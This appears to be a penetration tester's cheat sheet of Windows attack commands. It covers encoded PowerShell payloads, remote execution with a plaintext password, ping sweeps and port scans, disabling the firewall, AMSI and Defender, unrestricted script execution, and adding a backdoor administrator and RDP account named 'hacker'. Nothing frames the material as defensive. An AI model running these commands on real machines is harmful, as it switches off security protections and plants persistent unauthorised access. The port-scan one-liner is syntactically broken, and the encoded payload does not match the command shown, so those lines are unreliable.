# Windows Tricks

# PowerShell encoded base64

Create a base64 payload to avoid bad characters.

# Create the command to PowerShell execute
$ echo -n 'ping -n 2' | iconv -t utf-16le | base64 -w 0

# Run PowerShell with Encoded flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

# Run command as User (with creds)

$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}

# List running process with args

WMIC path win32_process get Caption,Processid,Commandline

# Scan for hosts and open ports in subnet

# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}

# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("",$)) "Port $ is open!"} 2>$null

# PowerShell

# PowerShell Directory

set PATH=%SystemRoot%\system32;%SystemRoot%;

# Search for files

Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue

# Windows Security

# Disable Firewall

NetSh Advfirewall set allprofiles state off

# Disable AMSI

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

# Disable Defender

sc stop WinDefend

# Execution Policy

Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser

# Add a RDP user

net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD